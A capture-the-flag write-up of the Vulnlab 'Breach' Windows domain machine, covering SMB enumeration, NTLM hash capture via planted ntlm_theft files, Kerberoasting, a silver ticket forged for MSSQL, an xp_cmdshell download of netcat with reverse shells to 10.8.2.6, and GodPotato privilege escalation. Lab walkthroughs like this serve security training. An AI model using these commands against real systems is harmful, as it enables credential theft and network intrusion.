In this walk through, we will be going through the Breach room from Vulnlab. This room is rated as Medium on the platform and it consist of capturing of a user NTLM hash by creating documents that a domain user will likely open in a SMB share. Using the captured credentials, performed Kerberoasting to get password of user svc_mssq. Post that, a silver ticket attack have to be executed with MSSQL in order to get initial access. For Privilege Escalation, SEImpersonate Privilege needs to be abused via GodPotato exploit to get root on the target. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Breach |
IPaddress | 10.10.95.5 |
Difficulty | Medium |
OS | Windows |
Description | Breach is a Medium Windows machine that requires capturing of user NTLM hash by creating documents that a domain user will likely open in a SMB share. Using the captured credentials, performed Kerberoasting to get password of user svc_mssq. Post that, a silver ticket attack have to be executed with MSSQL in order to get initial access. For Privilege Escalation, SEImpersonate Privilege needs to be abused via GodPotato exploit to get root on the target. |
Enumeration:
- I started off with a regular nmap scan along with all TCP port scan and UDP scan. Found multiple ports opened – 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more.
$ sudo nmap -sV -sC 10.10.95.5 Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 12:26 IST Nmap scan report for 10.10.95.5 Host is up (0.18s latency). Not shown: 987 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-22 06:56:35Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00 | ms-sql-ntlm-info: | Target_Name: BREACH | NetBIOS_Domain_Name: BREACH | NetBIOS_Computer_Name: BREACHDC | DNS_Domain_Name: breach.vl | DNS_Computer_Name: BREACHDC.breach.vl | DNS_Tree_Name: breach.vl |_ Product_Version: 10.0.20348 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-04-22T06:52:26 |_Not valid after: 2054-04-22T06:52:26 |_ssl-date: 2024-04-22T06:57:27+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: BREACH | NetBIOS_Domain_Name: BREACH | NetBIOS_Computer_Name: BREACHDC | DNS_Domain_Name: breach.vl | DNS_Computer_Name: BREACHDC.breach.vl | DNS_Tree_Name: breach.vl | Product_Version: 10.0.20348 |_ System_Time: 2024-04-22T06:56:48+00:00 | ssl-cert: Subject: commonName=BREACHDC.breach.vl | Not valid before: 2024-04-21T06:51:40 |_Not valid after: 2024-10-21T06:51:40 |_ssl-date: 2024-04-22T06:57:27+00:00; 0s from scanner time. Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | ms-sql-info: | 10.10.95.5:1433: | Version: | name: Microsoft SQL Server | number: 15.00.2000.00 | Product: Microsoft SQL Server |_ TCP port: 1433 | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2024-04-22T06:56:50 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 189.85 seconds
sudo nmap -p- -T5 10.10.95.5 PORT STATE SERVICE 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5985/tcp open wsman 9389/tcp open adws 49664/tcp open unknown 49667/tcp open unknown 49669/tcp open unknown 60843/tcp open unknown 61065/tcp open unknown 62932/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 391.54 seconds
sudo nmap -sU -T4 10.10.95.5 PORT STATE SERVICE 123/udp open ntp 389/udp open ldap Nmap done: 1 IP address (1 host up) scanned in 141.03 seconds
- Added hostname to my /etc/hosts file.
PORT 80
- The running webserver has a default IIS Page. Nothing fancy!
- Fired gobuster on the target but found no directories.
$ gobuster dir -u http://10.10.95.5/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x asp,aspx =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.95.5/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: asp,aspx [+] Timeout: 10s =============================================================== 2024/04/22 12:42:49 Starting gobuster in directory enumeration mode =============================================================== =============================================================== 2024/04/22 13:00:41 Finished ===============================================================
PORT 135
- Tried to enumerate usernames using RPCclient but got nothing.
PORT 139/445
- Tried to list the shares using SMB null authentication and got some interesting ones there – share and Users.
smbclient -L 10.10.95.5
- Next, i tried to peek into the “share” share and got 3 potential users of the domain.
$ smbclient //10.10.95.5/share Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Feb 17 19:41:08 2022 .. DHS 0 Thu Feb 17 21:08:00 2022 finance D 0 Thu Feb 17 16:49:34 2022 software D 0 Thu Feb 17 16:49:12 2022 transfer D 0 Thu Feb 17 19:30:35 2022 7863807 blocks of size 4096. 2613329 blocks available smb: \> cd finance smb: \finance\> ls . D 0 Thu Feb 17 16:49:34 2022 .. D 0 Thu Feb 17 19:41:08 2022 7863807 blocks of size 4096. 2615078 blocks available smb: \finance\> cd .. smb: \> cd software smb: \software\> ls . D 0 Thu Feb 17 16:49:12 2022 .. D 0 Thu Feb 17 19:41:08 2022 7863807 blocks of size 4096. 2615616 blocks available smb: \software\> cd .. smb: \> cd transfer smb: \transfer\> ls . D 0 Thu Feb 17 19:30:35 2022 .. D 0 Thu Feb 17 19:41:08 2022 claire.pope D 0 Thu Feb 17 16:51:35 2022 diana.pope D 0 Thu Feb 17 16:51:19 2022 julia.wong D 0 Thu Feb 17 16:54:39 2022 7863807 blocks of size 4096. 2615794 blocks available smb: \transfer\> cd claire.pope\ smb: \transfer\claire.pope\> ls NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\* smb: \transfer\claire.pope\> cd .. smb: \transfer\> cd diana.pope\ smb: \transfer\diana.pope\> ls NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\* smb: \transfer\diana.pope\> cd .. smb: \transfer\> cd julia.wong\ smb: \transfer\julia.wong\> ls NT_STATUS_ACCESS_DENIED listing \transfer\julia.wong\* smb: \transfer\julia.wong\> exit
- Looked in to the Users share too, found nothing but a bunch of VM files.
$ smbclient //10.10.95.5/Users Try "help" to get a list of possible commands. smb: \> ls . DR 0 Thu Feb 17 18:42:16 2022 .. DHS 0 Thu Feb 17 21:08:00 2022 Default DHR 0 Thu Feb 10 14:40:33 2022 desktop.ini AHS 174 Sat May 8 13:48:31 2021 Public DR 0 Wed Sep 15 08:38:59 2021 7863807 blocks of size 4096. 2832661 blocks available smb: \> cd Default\ smb: \Default\> ls . DHR 0 Thu Feb 10 14:40:33 2022 .. DR 0 Thu Feb 17 18:42:16 2022 AppData DH 0 Thu Aug 19 12:15:22 2021 Desktop DR 0 Thu Aug 19 11:54:36 2021 Documents DR 0 Thu Feb 10 06:29:34 2022 Downloads DR 0 Sat May 8 13:50:24 2021 Favorites DR 0 Sat May 8 13:50:24 2021 Links DR 0 Sat May 8 13:50:24 2021 Music DR 0 Sat May 8 13:50:24 2021 NTUSER.DAT AHn 524288 Thu Feb 17 21:08:01 2022 ntuser.ini AHSn 20 Thu Aug 19 12:15:22 2021 Pictures DR 0 Sat May 8 13:50:24 2021 Saved Games Dn 0 Sat May 8 13:50:24 2021 Videos DR 0 Sat May 8 13:50:24 2021 7863807 blocks of size 4096. 2829523 blocks available smb: \Default\> cd Desktop smb: \Default\Desktop\> ls . DR 0 Thu Aug 19 11:54:36 2021 .. DHR 0 Thu Feb 10 14:40:33 2022 EC2 Feedback.website A 527 Tue Jun 21 21:06:17 2016 EC2 Microsoft Windows Guide.website A 554 Tue Jun 21 21:06:23 2016 smb: \Default\Desktop\> get "EC2 Feedback.website" getting file \Default\Desktop\EC2 Feedback.website of size 527 as EC2 Feedback.website (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec) smb: \Default\Desktop\> get "EC2 Microsoft Windows Guide.website" getting file \Default\Desktop\EC2 Microsoft Windows Guide.website of size 554 as EC2 Microsoft Windows Guide.website (0.8 KiloBytes/sec) (average 0.7 KiloBytes/sec) smb: \Default\Desktop\> cd .. smb: \Default\> ls . DHR 0 Thu Feb 10 14:40:33 2022 .. DR 0 Thu Feb 17 18:42:16 2022 AppData DH 0 Thu Aug 19 12:15:22 2021 Desktop DR 0 Thu Aug 19 11:54:36 2021 Documents DR 0 Thu Feb 10 06:29:34 2022 Downloads DR 0 Sat May 8 13:50:24 2021 Favorites DR 0 Sat May 8 13:50:24 2021 Links DR 0 Sat May 8 13:50:24 2021 Music DR 0 Sat May 8 13:50:24 2021 NTUSER.DAT AHn 524288 Thu Feb 17 21:08:01 2022 ntuser.ini AHSn 20 Thu Aug 19 12:15:22 2021 Pictures DR 0 Sat May 8 13:50:24 2021 Saved Games Dn 0 Sat May 8 13:50:24 2021 Videos DR 0 Sat May 8 13:50:24 2021 smb: \Default\> get NTUSER.DAT getting file \Default\NTUSER.DAT of size 524288 as NTUSER.DAT (352.9 KiloBytes/sec) (average 168.0 KiloBytes/sec) smb: \> exit
- Next, i sprayed the usernames i had with the crackmapexec password parameter as well to check if some users has their usernames as passwords but got no luck.
crackmapexec smb 10.10.95.5 -u usernames.txt -p usernames.txt --continue-on-success
AS-REP Roasting
- On the found usernames, i tried to perform AS-REP roasting to check if any of the have the Kerberos Pre-Authentiation disabled however found no luck.
python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -usersfile usernames.txt -dc-ip 10.10.95.5 breach.vl/
PORT 389 (LDAP)
- Next, i tried my luck with LDAP with null authentication but got nothing back.
Exploitation:
- I tested to put a file on the “share” share and was able to to so. So, i generated bunch of files with ntlm_theft script. So, if a user on the domain checks my generated files, i will be able to capture their NTLM hashes with Responder.
python3 ntlm_theft.py --generate all --server 10.8.2.6 --filename breach
- After putting my files in each folder of the share. After a couple of minutes, i got a hit at my Responder listener and got the NetNTLMV2 hash of user Julia.Wong.
sudo python3 Responder.py -I tun0
Julia.Wong::BREACH:e97e9ce91c17dd24:E708C01FC1CE3E70A9F7ACCBB9319065:010100000000000000E9F759BD94DA01A580F8BA31DEC4E800000000020008005900350051005A0001001E00570049004E002D0041004C0030004C004D004A0043005A0046003700530004003400570049004E002D0041004C0030004C004D004A0043005A004600370053002E005900350051005A002E004C004F00430041004C00030014005900350051005A002E004C004F00430041004C00050014005900350051005A002E004C004F00430041004C000700080000E9F759BD94DA01060004000200000008003000300000000000000001000000002000002F81CF33D02685BFE9E78F04D11EC4FB31365E5DD736AABB06B37D04D31FFA660A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0038002E0032002E0036000000000000000000
- Cracked the hash using hashcat and got the password of user Julia.Wong.
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt -O
Julia.Wong: Computer1
- Logged into her share and got the user flag.
smbclient //10.10.95.5/share -U julia.wong --password=Computer1 cd transfer/julia.wong get local.txt
Kerberoasting
- After getting the flag. I wasn’t able to get a shell as user julia.wong, so enumerated other users on the domain. Found a list of them as per the below result. The interesting one in them was the svc_mssql account. We already know from the nmap scan that MSSQL is running on the target.
crackmapexec smb 10.10.95.5 -u julia.wong -p Computer1 --users
- Next, performed Kerberosating and got the hash for the svc_mssql SPN. Cracked it with hashcat and got the password.
python3 ~/Tools/impacket/examples/GetUserSPNs.py breach.vl/julia.wong:Computer1 -dc-ip 10.10.95.5 -request
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a6fb065aa9ae44c3e2617d1733f9b283$ad242f3eb74ed27fd0873e3247d4fe35aa90c1cf8ecb687307c80c4dc13885d2b4b0b7a58ac147db44ceb1de373dbf6db845967cad32faca6f9243b50aad0163884d0cb1556ef723ca967b2d09bba9a2d394997ad4d78f36b0ad54315efe164424a4de3d87c8f346e35efc5e51ea7f9244b8f4298fb1c3159963db0e2cbc14caece2f7ba2beff119024fd71b3547bbab03f556ebb980b706eac5a48c1870fe6c9a48955f2819597971abcc6166e962c6cce4a246472094c660d9da4e41623598ebe6e90888d42863ccfbce12a3f43fec2fe4fc68c5dce7ac670044364c028484b00985924ff6e01e3705b3a4f05cf9f3f23967e9198050d70370a07dfcc6373c91ae9f1834640c96af752ebd31ce75b2d5e1f7d13ea85a0bcb0c110b5fd1e619373019760b5063ddc5440c12be3141328a515cef6775c6d7646273f5b69a107a1b687a4c315511e9a9cdb0ce8fdc79dec416eca79867e55757bd26066a0162d53bd8b9308210490795b05eff619867e93ce4323389899785e17322b591464bb9e529c913030c3bc330e1570f9be37bf9f9fd5886ff14bff2e26030bbffb749f0fed99511a967081241e0abe57cd928d88d1b622c4c5105ca8de72388a19c0f66bfb5b183821ec85079b73140c860b98dbc31e7282d8c76836603310f0997f1eefdf55b9410f61293b072608c0afd244febbe28112739f958249663880128a41ecd65e405ee938e2492519211ae710665d72323ab2bc428a9da4f4fb45893f54e2cc5a3ffd58a344c6a657dd7722d6107ea284de65544e419977956840a3ec1356c668d92533f4a61238cccb3969e63d402656c7de088e12f7d960af069ddbb22740456f2f416f35fb98cd2beac9b0a9fd0f694524ecb7f06d5def6f1a73f1d8da6e3316fb81cbf994dc9a05ce09f8bd98296f20b20af55d1aa54edde4d591be68ff4bed47ad53fa20ee546765a45559a4a708f708b3348ecb7bc81b4550cbd972b61e690ab2152164f0fe3b7ba39e5f0b89cf7644e60276175d83a810a6ba92e6ddd7cb7d7f2ad81867289707af7f0ab7dfbec56d275fbc34634267ed52edf129dcbce28ecebeeea6ccffd34516aca170d06144b92440dfe04349ec522f0fa0726f185ff1749174c13bbbeaf33b051f1e1af10fb406468c835c3e3593b4200b7139f3585f603a415da926a3809b8e5cab2ac1983e3b37462000f18f2e8804679ba97ea773d80991aa5b5c26543e5d0d4558b2dc3e6cb6b7c3b87de80a9a1bc8ec8cd4c5dcd2ba187b99456745fed21a083dc1298fe1c1cd0f197d4cae4764923ec0e627494edfc1e5f13113d6a92557fa88c2620d847759be6769cb28547f439a77855fa64b772b32b0f4e5f49e0705c4aca4eecb59fd5a1e410de75368e083de8ca2027a563b5206ff429af2a6a92851bcd9ccb907c2cee057db956ad2773c9f9426bf421b42788a1f6c57bcfd0f7be597e35f1
hashcat -m 13100 sql_svc.hash /usr/share/wordlists/rockyou.txt -O
svc_mssql: Trustno1
Silver Ticket Attack
- I was still not able to get a shell access on the target with the svc_mssql creds. Tried to access the MSSQL with mssqlclient but got a limited shell. So, i tried to perform a Silver Ticket attack.
A Silver Ticket Attack is when an attacker forges authentication tickets in Microsoft’s Active Directory system, allowing them unauthorized access to network resources without legitimate credentials. It’s a type of cyber-attack exploiting weaknesses in the Kerberos authentication protocol.
In order to create a Silver Ticket for any service. We need three things:
- Domain SID
- NTLM hash of the user
- SPN Name
- To find the Domain SID, i used impacket’s Lookupsid script with Julia Wong creds.
python3 ~/Tools/impacket/examples/lookupsid.py breach.vl/Julia.Wong:[email protected]
- Used the below online utility to generate the NTLM hash of the svc_mssql password.
NTML Hash Generator: https://codebeautify.org/ntlm-hash-generator
- At last, created the silver ticket by using impacket’s ticketer script specifying the privilege to that of an Administrator.
impacket.ticketer -nthash '69596C7AA1E8DAEE17F8E78870E25A5C' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain breach.vl -spn 'MSSQLSvc/breach.vl:1433' -user-id 500 Administrator
Getting a shell
- Now, i used the generated ticket to log into the MSSQL server and configured it to download a netcat binary to the target and executing to give us a reverse shell.
export KRB5CCNAME=Administrator.ccache impacket.mssqlclient -k -no-pass breach.vl -windows-auth EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXECUTE xp_cmdshell 'whoami'; EXECUTE xp_cmdshell 'mkdir C:\Temp'; EXECUTE xp_cmdshell 'powershell.exe iwr -uri http://10.8.2.6:8000/nc.exe -Outfile C:\Temp\nc.exe'; EXECUTE xp_cmdshell 'C:\Temp\nc.exe 10.8.2.6 4444 -e cmd.exe';
Privilege Escalation:
- Once i landed a shell on the target. Looked into the privileges assigned to the user and found SEImpersonate Privilege enabled. So, i went directly for the Potato exploits.
whoami /all
- Used GodPotato exploit on target to get a shell as NT Authority/SYSTEM.
GodPotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 10.8.2.6 5555"
Also Read: Vulnlab – Baby
Conclusion:
So that was “Breach” for you. We started off with a regular nmap scan and found multiple ports opened – 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more. Next, created some documents using ntlm_theft.py and placed them in a SMB share which eventually help us to capture the hash of user Julia.Wong. Cracked the hash and performed Kerberoasting to get password of svc_mssql user. Next, performed a Silver ticket attack to get initial access on the target. For Privilege Escalation, SEImpersonate Privilege was abused via GodPotato exploit to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.